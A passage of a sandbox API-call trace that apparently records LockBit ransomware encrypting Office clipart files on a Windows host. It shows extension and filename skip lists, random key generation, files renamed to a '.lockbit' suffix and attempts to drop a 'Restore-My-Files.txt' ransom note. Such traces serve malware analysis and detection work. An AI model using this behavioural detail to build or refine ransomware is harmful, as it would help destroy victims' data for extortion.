[0164.115] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.116] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.116] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02368_.WMF.lockbit") returned 72 [0164.116] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02368_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02368_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0164.120] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.121] malloc (_Size=0x40068) returned 0x1ff1e60 [0164.121] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3368) returned 1 [0164.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0164.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0164.122] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.135] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02368_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02368_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.135] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.135] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.138] free (_Block=0x1fa2ed8) [0164.138] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02368_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.138] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.138] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.138] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02371_.WMF", cAlternateFileName="")) returned 1 [0164.138] lstrcmpiW (lpString1=".", lpString2="NA02371_.WMF") returned -1 [0164.138] lstrcmpiW (lpString1="..", lpString2="NA02371_.WMF") returned -1 [0164.138] PathFindExtensionW (pszPath="NA02371_.WMF") returned=".WMF" [0164.138] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.138] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.138] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.138] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.138] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.138] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.138] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.139] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.139] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.140] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02371_.WMF") returned 1 [0164.140] lstrcmpiW (lpString1="ntldr", lpString2="NA02371_.WMF") returned 1 [0164.140] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02371_.WMF") returned 1 [0164.140] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02371_.WMF") returned -1 [0164.140] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02371_.WMF") returned -1 [0164.140] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02371_.WMF") returned 1 [0164.140] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02371_.WMF") returned -1 [0164.141] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.141] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02371_.WMF") returned=".WMF" [0164.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.141] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.141] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.142] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.142] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.142] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.142] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.142] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.142] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.142] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.142] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02371_.WMF.lockbit") returned 72 [0164.142] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02371_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02371_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0164.143] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.143] malloc (_Size=0x40068) returned 0x3d70450 [0164.143] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3188) returned 1 [0164.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0164.144] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0164.145] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0164.152] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02371_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02371_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.152] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.152] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.154] free (_Block=0x1fa2ed8) [0164.154] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02371_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.154] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.154] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.154] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xcec, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02373_.WMF", cAlternateFileName="")) returned 1 [0164.154] lstrcmpiW (lpString1=".", lpString2="NA02373_.WMF") returned -1 [0164.154] lstrcmpiW (lpString1="..", lpString2="NA02373_.WMF") returned -1 [0164.154] PathFindExtensionW (pszPath="NA02373_.WMF") returned=".WMF" [0164.154] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.154] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.154] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.154] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.154] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.154] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.155] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.156] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.156] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.157] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02373_.WMF") returned 1 [0164.157] lstrcmpiW (lpString1="ntldr", lpString2="NA02373_.WMF") returned 1 [0164.157] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02373_.WMF") returned 1 [0164.157] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02373_.WMF") returned -1 [0164.157] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02373_.WMF") returned -1 [0164.157] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02373_.WMF") returned 1 [0164.157] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02373_.WMF") returned -1 [0164.157] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.157] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02373_.WMF") returned=".WMF" [0164.157] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.157] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.157] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.157] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.157] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.157] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.157] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.157] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.157] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.157] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.157] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.158] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.164] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.164] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.164] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02373_.WMF.lockbit") returned 72 [0164.164] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02373_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02373_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0164.165] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.165] malloc (_Size=0x40068) returned 0x3f70048 [0164.165] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=3308) returned 1 [0164.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0164.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.167] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0164.167] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0164.294] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02373_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02373_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.294] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.294] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.295] free (_Block=0x1fa2ed8) [0164.295] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02373_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.295] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.296] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.296] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02384_.WMF", cAlternateFileName="")) returned 1 [0164.297] lstrcmpiW (lpString1=".", lpString2="NA02384_.WMF") returned -1 [0164.297] lstrcmpiW (lpString1="..", lpString2="NA02384_.WMF") returned -1 [0164.297] PathFindExtensionW (pszPath="NA02384_.WMF") returned=".WMF" [0164.297] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 